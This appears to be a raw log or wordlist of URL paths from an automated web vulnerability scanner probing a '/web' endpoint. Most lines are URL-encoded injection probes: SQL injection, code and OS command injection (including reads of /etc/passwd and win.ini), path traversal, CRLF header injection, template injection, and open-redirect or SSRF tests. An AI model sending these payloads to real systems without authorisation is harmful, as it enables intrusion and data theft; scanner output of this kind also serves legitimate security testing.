/web
/web
/web
/web
/web
/web
/web
/should_not_xist_yyyyyyyyyyyyyyy
/web/
/
/admin%0auploads%0a/
/admin%0auploads%0a/should_not_xist_llllllllllll
/web/should_not_xist_mmmmmmmmmmmm
/web
/uuuu3uuuuuu
/UTF-8
/UTF-7
/%3ch%20xhx%3dyhy%3e
/fpwzyqmc
/http%3a%252f%252f192.168.1.106.fpwzyqmc
/https%3a%252f%252f192.168.1.106.fpwzyqmc
/%252f%252f192.168.1.106.fpwzyqmc
/web/admin%0auploads%0a/
/web/admin%0auploads%0a/should_not_xist_eeeeeeeeeee
/web/
/mmmm4mmmmmmm/
/UTF-8/
/UTF-7/
/%3ch%20xhx%3dyhy%3e/
/fpwzyqmc/
/http%3a%252f%252f192.168.1.106.fpwzyqmc/
/https%3a%252f%252f192.168.1.106.fpwzyqmc/
/%252f%252f192.168.1.106.fpwzyqmc/
/web
/web
/web
/web
/web
/web
/web
/should_not_xist_dddddddddd
/web
/123
/'
/%22
/%c2%bf'"(
/(
/)
/2%2b1
/1%2b2
/3%2b5
/2%2b6
/3%2ba
/3%2bb
/1-1
/2-2
/11-5
/12-6
/0-a
/0-b
/w'%7c%7c'eb
/w'%2b'eb
/w'%20'eb
/w'%7c%7c'eb
/w'%2b'eb
/w'%20'eb
/w%7c%7c'eb
/w%2b'eb
/w%20'eb
/webxxx'%20or%208%3d8--
/webxxx'%20or%207%3d5--
/webxxx'%20or%207%3d7--
/webxxx'%20or%205%3d8--
/webxxx'%20or%20's'%3d's
/webxxx'%20or%20's'%3d'r
/webxxx'%20or%20't'%3d't
/webxxx'%20or%20't'%3d'r
/webxxx%22%20or%208%3d8--
/webxxx%22%20or%207%3d5--
/webxxx%22%20or%207%3d7--
/webxxx%22%20or%205%3d8--
/webxxx%22%20or%20%22s%22%3d%22s
/webxxx%22%20or%20%22s%22%3d%22r
/webxxx%22%20or%20%22t%22%3d%22t
/webxxx%22%20or%20%22t%22%3d%22r
/21%20or%208%3d8--
/21%20or%207%3d5--
/21%20or%207%3d7--
/21%20or%205%3d8--
/web'%20and%208%3d8--
/web'%20and%207%3d5--
/web'%20and%207%3d7--
/web'%20and%205%3d8--
/web'%20and%20's'%3d's
/web'%20and%20's'%3d'r
/web'%20and%20't'%3d't
/web'%20and%20't'%3d'r
/web%22%20and%208%3d8--
/web%22%20and%207%3d5--
/web%22%20and%207%3d7--
/web%22%20and%205%3d8--
/web%22%20and%20%22s%22%3d%22s
/web%22%20and%20%22s%22%3d%22r
/web%22%20and%20%22t%22%3d%22t
/web%22%20and%20%22t%22%3d%22r
/web
/web
/web
/web
/web
/web
/should_not_xist_ppppppppppppp
/web
/echo%201889409%2b1889409%3b
/echo%201889409%2b1889409%3b%23
/%3becho%201889409%2b1889409%3b
/%3becho%201889409%2b1889409%3b%23
/'%3becho%201889409%2b1889409%3b
/'%3becho%201889409%2b1889409%3b%23
/%22%3becho%201889409%2b1889409%3b
/%22%3becho%201889409%2b1889409%3b%23
/print%201889409%2b1889409%3b
/print%201889409%2b1889409%3b%23
/%3bprint%201889409%2b1889409%3b
/%3bprint%201889409%2b1889409%3b%23
/'%3bprint%201889409%2b1889409%3b
/'%3bprint%201889409%2b1889409%3b%23
/%22%3bprint%201889409%2b1889409%3b
/%22%3bprint%201889409%2b1889409%3b%23
/print%201889409%2b1889409
/print%201889409%2b1889409%23
/%3bprint%201889409%2b1889409
/%3bprint%201889409%2b1889409%23
/'%3bprint%201889409%2b1889409
/'%3bprint%201889409%2b1889409%23
/%22%3bprint%201889409%2b1889409
/%22%3bprint%201889409%2b1889409%23
/Response.Write(1889409%2b1889409)
/Response.Write(1889409%2b1889409)'
/%3bResponse.Write(1889409%2b1889409)
/%3bResponse.Write(1889409%2b1889409)'
/'%3bResponse.Write(1889409%2b1889409)
/'%3bResponse.Write(1889409%2b1889409)'
/%22%3bResponse.Write(1889409%2b1889409)
/%22%3bResponse.Write(1889409%2b1889409)'
/puts%201889409%2b1889409
/puts%201889409%2b1889409%23
/%3bputs%201889409%2b1889409
/%3bputs%201889409%2b1889409%23
/'%3bputs%201889409%2b1889409
/'%3bputs%201889409%2b1889409%23
/%22%3bputs%201889409%2b1889409
/%22%3bputs%201889409%2b1889409%23
/web
/web
/web
/web
/web
/web
/should_not_xist_bbbbbbbbbb
/web/
/
/admin%0auploads%0a/
/admin%0auploads%0a/should_not_xist_jjjjjjjjjjjj
/web/should_not_xist_yyyyyyyyyyyyyyy
/web
/%20%252fbin%252fcat%20%252fetc%252fpasswd
/%26%26%20%252fbin%252fcat%20%252fetc%252fpasswd
/%7c%20%252fbin%252fcat%20%252fetc%252fpasswd
/%3b%20%252fbin%252fcat%20%252fetc%252fpasswd
/%20%60%252fbin%252fcat%20%252fetc%252fpasswd%60
/web/admin%0auploads%0a/
/web%20%252fbin%252fcat%20%252fetc%252fpasswd
/web%26%26%20%252fbin%252fcat%20%252fetc%252fpasswd
/web%7c%20%252fbin%252fcat%20%252fetc%252fpasswd
/web%3b%20%252fbin%252fcat%20%252fetc%252fpasswd
/web%20%60%252fbin%252fcat%20%252fetc%252fpasswd%60
/web
/web
/web/admin%0auploads%0a/should_not_xist_vvvvvvvvvvvvvv
/%20ping%20-n%206%20localhost
/%20ping%20-c%206%20localhost
/%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/%26%26%20ping%20-n%206%20localhost
/%26%26%20ping%20-c%206%20localhost
/%26%26%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/%7c%20ping%20-n%206%20localhost
/%7c%20ping%20-c%206%20localhost
/%7c%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/%3b%20ping%20-n%206%20localhost
/%3b%20ping%20-c%206%20localhost
/%3b%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/%20%60ping%20-c%206%20localhost%60
/%20run%20ping%20-n%206%20localhost
/web%20ping%20-n%206%20localhost
/web%20ping%20-c%206%20localhost
/web%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/web%26%26%20ping%20-n%206%20localhost
/web%26%26%20ping%20-c%206%20localhost
/web%26%26%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/web%7c%20ping%20-n%206%20localhost
/web/
/web%7c%20ping%20-c%206%20localhost
/web%7c%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/web%3b%20ping%20-n%206%20localhost
/web%3b%20ping%20-c%206%20localhost
/web%3b%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/web%20%60ping%20-c%206%20localhost%60
/web%20run%20ping%20-n%206%20localhost
/%20%252fbin%252fcat%20%252fetc%252fpasswd/
/%20type%20%25SYSTEMROOT%25%5cwin.ini/
/%26%26%20%252fbin%252fcat%20%252fetc%252fpasswd/
/%26%26%20type%20%25SYSTEMROOT%25%5cwin.ini/
/%7c%20%252fbin%252fcat%20%252fetc%252fpasswd/
/%7c%20type%20%25SYSTEMROOT%25%5cwin.ini/
/%3b%20%252fbin%252fcat%20%252fetc%252fpasswd/
/%3b%20type%20%25SYSTEMROOT%25%5cwin.ini/
/%20%60%252fbin%252fcat%20%252fetc%252fpasswd%60/
/%20run%20type%20%25SYSTEMROOT%25%5cwin.ini/
/web%20%252fbin%252fcat%20%252fetc%252fpasswd/
/web%20type%20%25SYSTEMROOT%25%5cwin.ini/
/web%26%26%20%252fbin%252fcat%20%252fetc%252fpasswd/
/web%26%26%20type%20%25SYSTEMROOT%25%5cwin.ini/
/web%7c%20%252fbin%252fcat%20%252fetc%252fpasswd/
/web%7c%20type%20%25SYSTEMROOT%25%5cwin.ini/
/web%3b%20%252fbin%252fcat%20%252fetc%252fpasswd/
/web%3b%20type%20%25SYSTEMROOT%25%5cwin.ini/
/web%20%60%252fbin%252fcat%20%252fetc%252fpasswd%60/
/web%20run%20type%20%25SYSTEMROOT%25%5cwin.ini/
/web/
/web/
/%20ping%20-n%206%20localhost/
/%20ping%20-c%206%20localhost/
/%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/%26%26%20ping%20-n%206%20localhost/
/%26%26%20ping%20-c%206%20localhost/
/%26%26%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/%7c%20ping%20-n%206%20localhost/
/%7c%20ping%20-c%206%20localhost/
/%7c%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/%3b%20ping%20-n%206%20localhost/
/%3b%20ping%20-c%206%20localhost/
/%3b%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/%20%60ping%20-c%206%20localhost%60/
/%20run%20ping%20-n%206%20localhost/
/web%20ping%20-n%206%20localhost/
/web%20ping%20-c%206%20localhost/
/web%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/web%26%26%20ping%20-n%206%20localhost/
/web%26%26%20ping%20-c%206%20localhost/
/web%26%26%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/web%7c%20ping%20-n%206%20localhost/
/web%7c%20ping%20-c%206%20localhost/
/web%7c%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/web%3b%20ping%20-n%206%20localhost/
/web%3b%20ping%20-c%206%20localhost/
/web%3b%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/web%20%60ping%20-c%206%20localhost%60/
/web%20run%20ping%20-n%206%20localhost/
/web
/web
/should_not_xist_bbbbbbbbbb
/web/
/
/admin%0auploads%0a/
/admin%0auploads%0a/should_not_xist_jjjjjjjjjjjj
/web
/%3c!--'%22a
/web/should_not_xist_hhhhhhhhhhh
/web/admin%0auploads%0a/
/web/admin%0auploads%0a/should_not_xist_yyyyyyyyyyyyyyy
/web/
/%3c!--'%22a/
/web
/web
/web
/web
/web
/web
/web
/should_not_xist_jjjjjjjjjjjj
/web/
/
/admin%0auploads%0a/
/admin%0auploads%0a/should_not_xist_fffffffffff
/web
/%23%5e(%24!%40%24)(()))******
/web/should_not_xist_bbbbbbbbbb
/web/admin%0auploads%0a/
/web/admin%0auploads%0a/should_not_xist_dddddddddd
/web/
/%23%5e(%24!%40%24)(()))******/
/web
/web
/should_not_xist_cccccccccc
/web/
/
/admin%0auploads%0a/
/admin%0auploads%0a/should_not_xist_ggggggggggg
/web
/%0d%0aNeww%3a%20Headerr
/web%0d%0aNeww%3a%20Headerr
/aa%0d%0aNeww%3a%20Headerr
/webaa%0d%0aNeww%3a%20Headerr
/%0d%0aNeww%3a%20Headerr%0d%0a
/web%0d%0aNeww%3a%20Headerr%0d%0a
/aa%0d%0aNeww%3a%20Headerr%0d%0a
/webaa%0d%0aNeww%3a%20Headerr%0d%0a
/web
/web
/should_not_xist_ooooooooooooo
/web/
/
/admin%0auploads%0a/
/admin%0auploads%0a/should_not_xist_wwwwwwwwwwwwwww
/web
/%24%7b8590556%2b8590556%7d
/web/should_not_xist_wwwwwwwwwwwwwww
/web/admin%0auploads%0a/
/web/admin%0auploads%0a/should_not_xist_rrrrrrrrrrrrrr
/web/
/%24%7b4674984%2b4674984%7d/
/web
/web
/web
/web
/web
/should_not_xist_eeeeeeeeee
/web/
/
/admin%0auploads%0a/
/admin%0auploads%0a/should_not_xist_hhhhhhhhhhh
/web/should_not_xist_jjjjjjjjjjjj
/web/admin%0auploads%0a/
/web/admin%0auploads%0a/should_not_xist_fffffffffff
/web
/web/
/web
/web
/should_not_xist_yyyyyyyyyyyyyyy
/web/
/
/admin%0auploads%0a/
/admin%0auploads%0a/should_not_xist_ggggggggggg
/web/should_not_xist_tttttttttttttt
/web
/localhost%3a65555
/web/admin%0auploads%0a/
/localhost%3a65533
/localhost%3a66666
/localhost%3a65534
/web/admin%0auploads%0a/should_not_xist_qqqqqqqqqqqqq
/web/
/localhost%3a65555/
/localhost%3a65533/
/localhost%3a66666/
/localhost%3a65534/
/web
/web
/web
/web
/web
/web
/web
/web
/web
/should_not_xist_qqqqqqqqqqqqq
/web/
/
/admin%0auploads%0a/
/admin%0auploads%0a/should_not_xist_tttttttttttttt
/web/should_not_xist_vvvvvvvvvvvvvvv
/web
/eziepwlivt
/http%3a%252f%252fexample.org
/web/admin%0auploads%0a/
/http%3a%252f%252f192.168.1.106.example.org
/https%3a%252f%252fexample.org
/https%3a%252f%252f192.168.1.106.example.org
/%252f%252fexample.org
/%252f%252f192.168.1.106.example.org
/example.org
/192.168.1.106.example.org
/URL%3d'http%3a%252f%252fexample.org'
/URL%3d'http%3a%252f%252f192.168.1.106.example.org'
/5%3bURL%3d'http%3a%252f%252fexample.org'
/5%3bURL%3d'http%3a%252f%252f192.168.1.106.example.org'
/web/admin%0auploads%0a/should_not_xist_iiiiiiiiiii
/web/
/eziepwlivt/
/http%3a%252f%252fexample.org/
/http%3a%252f%252f192.168.1.106.example.org/
/https%3a%252f%252fexample.org/
/https%3a%252f%252f192.168.1.106.example.org/
/%252f%252fexample.org/
/%252f%252f192.168.1.106.example.org/
/example.org/
/192.168.1.106.example.org/
/URL%3d'http%3a%252f%252fexample.org'/
/URL%3d'http%3a%252f%252f192.168.1.106.example.org'/
/5%3bURL%3d'http%3a%252f%252fexample.org'/
/5%3bURL%3d'http%3a%252f%252f192.168.1.106.example.org'/
/web
/web
/should_not_xist_hhhhhhhhhhh
/web/
/
/admin%0auploads%0a/
/admin%0auploads%0a/should_not_xist_yyyyyyyyyyyyyyy
/web/should_not_xist_tttttttttttttt
/web/admin%0auploads%0a/
/web
/web/
/aaa
/%252f
/%5c
/file%3a%252faaa
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
/web/admin%0auploads%0a/should_not_xist_kkkkkkkkkkkk
/aaa/
/%252f/
/%5c/
/file%3a%252faaa/
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd/
/web
/web
/web
/should_not_xist_ggggggggggg
/web
/www.iana.org
/www.iana.org%252f
/www.iana.org%252fa
/http%3a%252f%252fwww.iana.org
/http%3a%252f%252fwww.iana.org%252f
/http%3a%252f%252fwww.iana.org%252fa
/https%3a%252f%252fwww.iana.org
/https%3a%252f%252fwww.iana.org%252f
/https%3a%252f%252fwww.iana.org%252fa
/r39637803577390284079.example.org
/r39637803577390284079.example.org
/r39637803577391965119.example.org%252f
/r39637803577391965119.example.org%252f
/r39637803577393736310.example.org%252fa
/r39637803577393736310.example.org%252fa
/http%3a%252f%252fr39637803577395483937.example.org
/http%3a%252f%252fr39637803577395483937.example.org
/http%3a%252f%252fr39637803577397158689.example.org%252f
/http%3a%252f%252fr39637803577397158689.example.org%252f
/http%3a%252f%252fr39637803577399536586.example.org%252fa
/http%3a%252f%252fr39637803577399536586.example.org%252fa
/https%3a%252f%252fr39637803577401584610.example.org
/https%3a%252f%252fr39637803577401584610.example.org
/https%3a%252f%252fr39637803577403210035.example.org%252f
/https%3a%252f%252fr39637803577403210035.example.org%252f
/https%3a%252f%252fr39637803577404731872.example.org%252fa
/https%3a%252f%252fr39637803577404731872.example.org%252fa
